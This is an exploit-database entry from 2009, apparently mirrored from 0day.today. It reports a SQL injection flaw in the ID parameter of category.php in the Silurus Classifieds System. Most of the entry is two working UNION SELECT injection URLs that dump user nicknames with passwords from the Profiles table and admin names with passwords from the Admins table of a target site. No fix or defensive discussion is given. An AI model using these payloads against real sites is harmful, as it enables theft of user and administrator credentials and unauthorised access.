id: 5707
date: 08/27/2009
title: Silurus Classifieds System (category.php) SQL Injection Vulnerability
author: Mr.SQL
cves: 

=====================================================================
Silurus Classifieds System (category.php) SQL Injection Vulnerability
=====================================================================



########################
## Remote SQL Injection Vulnerability ( category.php ID )
##
## Silurus Classifieds System
##
## http://snowhall.com/silurus
##
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/category.php?ID=1+and+1=0+UNION+SELECT+0,0,0,CONCAT_WS(0x3a3a,NickName,Password),0,0,0,0,0,0+FROM+Profiles--
## www.TraGeT.CoM/category.php?ID=1+and+1=0+UNION+SELECT+0,0,0,CONCAT_WS(0x3a3a,Name,Password),0,0,0,0,0,0+FROM+Admins--
##
########################
########################
 
Download ::  http://snowhall.com/downloads/silurus.php
 
#########################################################################################################
#########################################################################################################






#  0day.today [2023-03-23]  #